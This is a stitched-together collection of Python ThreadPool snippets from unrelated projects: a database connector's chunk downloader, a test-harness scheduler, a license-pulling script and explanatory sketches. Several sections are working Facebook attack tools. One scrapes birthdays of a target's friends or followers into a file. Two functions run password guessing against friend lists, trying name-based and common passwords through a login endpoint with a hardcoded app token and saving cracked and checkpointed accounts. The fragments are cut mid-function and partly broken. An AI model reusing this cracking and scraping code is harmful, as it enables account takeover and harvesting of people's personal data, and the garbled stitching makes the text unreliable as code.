                        u'chunk %s/%s is NOT ready to consume'
                        u' in %s/%s(s)', self._next_chunk_to_consume + 1,
                        self._chunk_size,
                        (wait_counter + 1) * WAIT_TIME_IN_SECONDS,
                        MAX_WAIT * WAIT_TIME_IN_SECONDS)
                    self._chunk_cond.wait(WAIT_TIME_IN_SECONDS)
            else:
                logger.debug(
                    u'chunk %s/%s is still NOT ready. Restarting chunk '
                    u'downloader threads', self._next_chunk_to_consume + 1,
                    self._chunk_size)
                self._pool.terminate()  # terminate the thread pool
                self._pool = ThreadPool(self._effective_threads)
                for idx0 in range(self._effective_threads):
                    idx = idx0 + self._next_chunk_to_consume
                    self._pool.apply_async(self._download_chunk, [idx])
            if done:
                break
        else:
            Error.errorhandler_wrapper(
                self._connection, self._cursor, OperationalError, {
                    u'msg': u'The result set chunk download fails or hangs for '
                    u'unknown reason.',
                    u'errno': ER_CHUNK_DOWNLOAD_FAILED
                })
        logger.debug(u'chunk %s/%s is ready to consume',
                     self._next_chunk_to_consume + 1, self._chunk_size)

        ret = self._chunks[self._next_chunk_to_consume]
        self._next_chunk_to_consume += 1
        return ret
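# Illustrative sketch (not the connector code above) of the prefetch pattern that
# next_chunk() relies on: a ThreadPool downloads chunks in the background, a
# Condition marks them ready, and the consumer blocks until the next index is
# available. All names here (ChunkPrefetcher, _download) are hypothetical.
import threading
from collections import namedtuple
from multiprocessing.pool import ThreadPool

Chunk = namedtuple('Chunk', ['result_data', 'ready'])

class ChunkPrefetcher(object):
    def __init__(self, urls, threads=4):
        self._urls = urls
        self._chunks = [Chunk(None, False) for _ in urls]
        self._prefetch = min(threads, len(urls))
        self._cond = threading.Condition()
        self._pool = ThreadPool(threads)
        self._next = 0
        for idx in range(self._prefetch):            # warm the download window
            self._pool.apply_async(self._download, [idx])

    def _download(self, idx):
        data = 'payload for %s' % self._urls[idx]    # stand-in for a real fetch
        with self._cond:
            self._chunks[idx] = Chunk(data, True)
            self._cond.notify_all()

    def next_chunk(self):
        idx = self._next
        with self._cond:
            while not self._chunks[idx].ready:       # wait for the downloader
                self._cond.wait(1.0)
        self._next += 1
        nxt = idx + self._prefetch                   # keep the window full
        if nxt < len(self._urls):
            self._pool.apply_async(self._download, [nxt])
        return self._chunks[idx].result_data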
Exemple #39
    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument and it'll default
        # to a soft limit. If, however, max_processes is passed, we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] is None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        self.average_load = params['average_load']

        self.min_report_time = params['min_reported_time']

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot lock when processing resource allocations and modifying slots_in_use
        self.slot_lock = threading.Lock()

        # Job lock when modifying a jobs status
        self.activity_lock = threading.Lock()

        # Job count lock when modifying incoming/outgoing jobs
        self.job_count_lock = threading.Lock()

        # A combination of processors + threads (-j/-n) currently in use, that a job requires
        self.slots_in_use = 0

        # Count of jobs which need to complete
        self.job_count = 0

        # Set containing all submitted jobs
        self.__job_bank = set([])

        # Total running Job and Test failures encountered
        self.__failures = 0

        # Allow threads to set a global exception
        self.__error_state = False

        # Private set of jobs currently running
        self.__active_jobs = set([])

        # Jobs that are taking longer to finish than the allotted time are reported back early to inform
        # the user 'stuff' is still running. Jobs entering this set will not be reported again.
        self.jobs_reported = set([])

        # The last time the scheduler reported something
        self.last_reported_time = clock()

        # Sets of threading objects created by jobs entering and exiting the queues. When scheduler.waitFinish()
        # is called, and both thread pools are empty, the pools shut down, and the call to waitFinish() returns.
        self.__status_pool_lock = threading.Lock()
        self.__runner_pool_lock = threading.Lock()
        self.__status_pool_jobs = set([])
        self.__runner_pool_jobs = set([])

        # True when scheduler.waitFinish() is called. This alerts the scheduler, no more jobs are
        # to be scheduled. KeyboardInterrupts are then handled by the thread pools.
        self.__waiting = False
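# Illustrative sketch (not part of the TestHarness itself) of the two-pool pattern
# above: run_pool executes jobs in parallel, while a one-worker status_pool
# serializes status reporting so messages never interleave. run_job/report are
# hypothetical stand-ins for the real scheduler callbacks.
import time
from multiprocessing.pool import ThreadPool

run_pool = ThreadPool(processes=4)
status_pool = ThreadPool(processes=1)

def report(job_id):
    print('job %d finished' % job_id)        # only one status worker ever runs this

def run_job(job_id):
    time.sleep(0.1)                          # pretend to do some work
    status_pool.apply_async(report, [job_id])
    return job_id

results = [run_pool.apply_async(run_job, [i]) for i in range(8)]
for r in results:
    r.get()                                  # wait for the runners to finish
run_pool.close(); run_pool.join()
status_pool.close(); status_pool.join()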
Exemple #40
def dob_select():
    select = raw_input('\n Choose Option >>> ')
    id = []
    nms = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        print '\t    \x1b[1;32mGrab DOB From Friendlist\x1b[0;97m'
        print ''
        idt = raw_input(' Put Id/user : '******'https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print ' Target Id : ' + q['name']
        except KeyError:
            print ''
            print '\x1b[1;31mID Not Found' + c2
            print ''
            raw_input('\nPress enter to back ')
            dob_select()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token, headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        print '\x1b[1;32m Grab DOB From Followers\x1b[0;97m'
        print ''
        idt = raw_input(' Put Id/user : '******'https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print ' Target user : '******'name']
        except KeyError:
            print '\t    \x1b[1;31mID Not Found\x1b[0;97m'
            raw_input('\nPress enter to back ')
            dob_select()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        dob()
    elif select == '4':
        b_menu()
    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        dob_select()
    print ' Total IDs : ' + str(len(id))
    print ' The Process has started'
    print ' Note : This is for testing only'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            q = requests.get('https://graph.facebook.com/' + uid + '?access_token=' + token, headers=header).text
            d = json.loads(q)
            y = d['birthday']
            print '\x1b[1;32m ' + uid + ' \x1b[1;30m ' + name + ' | ' + y + '\x1b[0;97m'
            nmb = open('dobs.txt', 'a')
            nmb.write(name + ' | ' + uid + ' | ' + y + '\n')
            nmb.close()
            nms.append(number)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' Process has completed'
    print ' Total DOB :  ' + str(len(nms))
    print ''
    print 47 * '-'
    print ''
    raw_input('\n Press enter to back ')
    extract_dob()
def pilih_super():
	peak = raw_input("\n\033[1;31;40m➣➣ \033[1;97m")
	if peak =="":
		print "\033[1;39mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo

		jalan('\033[0;39m[•] Getting IDs \033[0;39m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])

	elif peak =="2":
		os.system('clear')
		print logo
		idt = raw_input("\033[0;39m* Enter ID : ")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[0;31;39m[•] Name : "+op["name"]
		except KeyError:
			print"\033[0;39m[•] ID Not Found!"
			raw_input("\n\033[0;39m[\033[0;39mBack\033[0;39m]")
			super()
		print"\033[0;39;40m[•] Getting IDs..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="3":
		os.system('clear')
		print logo
		brute()	
	elif peak =="4":
		os.system('clear')
		print logo                  
		try:
			idlist = raw_input('\033[0;39m[+] \033[0;39mEnter the file name \033[0;39m: \033[0;39m')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '\x1b[0;35;39[!] \x1b[0;35;39File not found'
			raw_input('\n\x1b[0;35;39[ \x1b[0;35;39Exit \x1b[0;35;39]')
			super()
	elif peak =="0":
		menu()
	else:
		print "\033[0;39mFill in correctly"
		pilih_super()

	
	print "\033[0;39;40m[•] Total IDs : \033[0;97m"+str(len(id))
	jalan('\033[0;39;40m[•] Please Wait...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[0;39;40m[•] Cloning\033[0;97m"+o),;sys.stdout.flush();time.sleep(1)
	print "\n\033[0;39m ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
	print "\033[0;39m Wait Cracking Is Pending"
	print "\033[0;39m ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"

	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass 
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b['first_name'] + b['last_name']
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass1 + '\033[0;39m | \033[0;39m' + b['name']
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[0;36;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass1 + '\033[0;39m | \033[0;39m' + b['name']
					cek = open("out/CP.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = b['first_name'] + '123'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\033[0;91m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass2 + '\033[0;39m | \033[0;39m' + b['name']
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[0;36;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass2 + '\033[0;39m | \033[0;39m' + b['name']
							cek = open("out/CP.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						else:
							pass3 = b['first_name'] + '12345'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass3 + '\033[0;39m | \033[0;39m' + b['name']
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass3 + '\033[0;39m | \033[0;39m' + b['name']
									cek = open("out/CP.txt", "a")
									cek.write(user+"|"+pass3+"\n")
									cek.close()
									cekpoint.append(user+pass4)
								else:
									pass4 = b['first_name'] + '1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass4 + '\033[0;39m | \033[0;39m' + b['name']
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass4 + '\033[0;39m | \033[0;39m' + b['name']
											cek = open("out/CP.txt", "a")
											cek.write(user+"|"+pass4+"\n")
											cek.close()
											cekpoint.append(user+pass4)
										else:
											pass5 = '786786'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass5 + '\033[0;39m | \033[0;39m' + b['name']
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass5 + '\033[0;39m | \033[0;39m' + b['name']
													cek = open("out/CP.txt", "a")
													cek.write(user+"|"+pass5+"\n")
													cek.close()
													cekpoint.append(user+pass5)
												else:
													pass6 = b['last_name'] + '123'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass6 + '\033[0;39m | \033[0;39m' + b['name']
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass6 + '\033[0;39m | \033[0;39m' + b['name']
															cek = open("out/CP.txt", "a")
															cek.write(user+"|"+pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)
														else:
															pass7 = 'pakistan'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass7 + '\033[0;39m | \033[0;39m' + b['name']
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass7 + '\033[0;39m | \033[0;39m' + b['name']
																	cek = open("out/CP.txt", "a")
																	cek.write(user+"|"+pass7+"\n")
																	cek.close()
																	cekpoint.append(user+pass7)
																else:
																	pass8 = b['last_name'] + '786'
																	data = urllib.urlopen("https://b-api.facebook.com/methode/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f522ef6")
																	q = json.load(data)
																	if 'access_token' in q:
																		print '\033[0;92m[OK] \033[0;39m '+ user + ' \x1b[0;36;39|\033[0;39m ' + pass8 + '\033[0;39m | \033[0;39m' + b['name']
																		oks.append(user+pass8)
																	else:
																		if 'www.facebook.com' in q["error_msg"]:
																			print '\x1b[0;91;39[CP] \033[0;39m ' + user + '\x1b[0;36;39|\033[0;39m ' + pass8 + '\033[0;39m | \033[0;39m' + b['name']
																			cek = open("out/CP.txt", "a")
																			cek.close()
																			cekpoint.append(user+pass8)
																	
		except:																		
			pass
		
	p = ThreadPool(30)
	p.map(main, id) 
	
	print '\033[0;39;40m[•] Process Has Been Completed\033[0;39m....'
	print "\033[0;39;40m[+] Total OK/\033[0;97mCP \033[0;39m: \033[0;39m"+str(len(oks))+"\033[0;39;40m/\033[0;39;40m"+str(len(cekpoint))
	print '\033[0;39;40m[+] CP File Has Been Saved : save/cp.txt'
	print """
\033[0;30;39───────────────────────────────────────────
           """
	raw_input("\n\033[0;39m[\033[0;39mExit\033[0;39m]")
	os.system('python2 a')
Exemple #42
def pilih_super():
    peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
    if peak == "":
        print "\x1b[1;91mFill in correctly"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
        jalan('\033[1;93mGetting IDs \033[1;97m...')
        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        idt = raw_input(
            "\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
        print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────╯♡"
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;93mName\033[1;93m:\033[1;97m " + op["name"]
        except KeyError:
            print "\x1b[1;92mID Not Found!"
            raw_input("\n\033[1;96m[\033[1;94mUsman\033[1;96m]")
            super()
        print "\033[1;93mGetting IDs\033[1;93m..."
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "0":
        menu()
    else:
        print "\x1b[1;91mFill in correctly"
        pilih_super()

    print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m" + str(len(id))
    jalan('\033[1;92mPlease Wait\033[1;93m...')
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print("\r\033[1;91mCloning\033[1;93m" + o),
        sys.stdout.flush()
        time.sleep(1)
    print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
    jalan(' \033[1;93m ........Cloning Start plzzz Wait.......... ')
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = ('786786')
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;92m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
                    cek = open("out/checkpoint.txt", "a")
                    cek.write(user + "|" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = 'Pakistan'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
                            cek = open("out/checkpoint.txt", "a")
                            cek.write(user + "|" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = a['first_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
                                    cek = open("out/checkpoint.txt", "a")
                                    cek.write(user + "|" + pass3 + "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = b['first_name'] + '@#$&'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
                                            cek = open("out/checkpoint.txt",
                                                       "a")
                                            cek.write(user + "|" + pass4 +
                                                      "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            pass5 = b['last_name'] + '12345'
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
                                                    cek = open(
                                                        "out/checkpoint.txt",
                                                        "a")
                                                    cek.write(user + "|" +
                                                              pass5 + "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = b[
                                                        'last123_name'] + 'khan'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
                                                            cek = open(
                                                                "out/checkpoint.txt",
                                                                "a")
                                                            cek.write(user +
                                                                      "|" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
                                                        else:
                                                            a = requests.get(
                                                                'https://graph.facebook.com/'
                                                                + user +
                                                                '/?access_token='
                                                                + toket)
                                                            b = json.loads(
                                                                a.text)
                                                            pass7 = b[
                                                                'first_name'] + 'afridi'
                                                            data = urllib.urlopen(
                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                + (user) +
                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                            )
                                                            q = json.load(data)
                                                            if 'access_token' in q:
                                                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
                                                                oks.append(
                                                                    user +
                                                                    pass7)
                                                            else:
                                                                if 'www.facebook.com' in q[
                                                                        "error_msg"]:
                                                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
                                                                    cek = open(
                                                                        "out/checkpoint.txt",
                                                                        "a")
                                                                    cek.write(
                                                                        user +
                                                                        "|" +
                                                                        pass7 +
                                                                        "\n")
                                                                    cek.close()
                                                                    cekpoint.append(
                                                                        user +
                                                                        pass7)

        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
    print "  \033[1;93m«---•◈•---Mode By Usman Tech---•◈•---»"
    print '\033[1;91mProcess Has Been Completed\033[1;92m....'
    print "\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m" + str(
        len(oks)) + "\033[1;97m/\033[1;95m" + str(len(cekpoint))
    print """
             
             ...........███ ]▄▄▄▄▄▃
             ..▂▄▅█████▅▄▃▂
             [███████████████]
             ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤
♡──────────────•◈•──────────────♡.
: \033[1;96m .....Usman Khan  Usman Tech........... \033[1;93m :
♡──────────────•◈•──────────────♡.' 
                whatsapp Num
               +923134572306"""

    raw_input("\n\033[1;92m[\033[1;94mBack\033[1;96m]")
    menu()
    with open(dep_url_yaml) as file:
        dep_config = yaml.full_load(file)

    maven_url_temp = 'https://repo1.maven.org/maven2/{module}/{version}'

    csv_list = []
    no_licenses = []
    no_license_type = []
    incorrect_source_url = []

    logging.info(
        'Pulling license for {num_deps} dependencies using {num_threads} threads.'
        .format(num_deps=len(dependencies['dependencies']),
                num_threads=THREADS))
    thread_lock = threading.Lock()
    pool = ThreadPool(THREADS)
    pool.map(execute, dependencies['dependencies'])

    write_to_csv(csv_list)

    error_msg = []
    run_status = 'succeed'
    if no_licenses:
        logging.error(no_licenses)
        how_to = '**************************************** ' \
                 'Licenses were not able to be pulled ' \
                 'automatically for some dependencies. Please search source ' \
                 'code of the dependencies on the internet and add "license" ' \
                 'and "notice" (if available) field to {yaml_file} for each ' \
                 'missing license. Dependency List: [{dep_list}]'.format(
            dep_list=','.join(sorted(no_licenses)), yaml_file=dep_url_yaml)
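# Illustrative sketch (not from the original script) of the ThreadPool + Lock
# pattern used above: worker threads look up data for each dependency and append
# rows to a shared list under thread_lock. `fetch_license` and the sample
# dependency dicts are hypothetical.
import threading
from multiprocessing.pool import ThreadPool

THREADS = 16
thread_lock = threading.Lock()
csv_list = []

def fetch_license(dep):
    row = '{module},{version}'.format(**dep)   # stand-in for the real license lookup
    with thread_lock:                          # guard the shared list
        csv_list.append(row)

pool = ThreadPool(THREADS)
pool.map(fetch_license, [{'module': 'org.example/lib', 'version': '1.0'}])
pool.close()
pool.join()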
Exemple #44
class Scheduler(MooseObject):
    """
    Base class for handling jobs asynchronously. To use this class, call .schedule()
    and supply a list of testers to schedule. Each group of testers supplied will begin
    running immediately.

    Syntax:
       .schedule([list of tester objects])

    A list of testers will be added to a queue and begin calling their derived run method.
    You can continue to add more testers to the queue in this fashion.

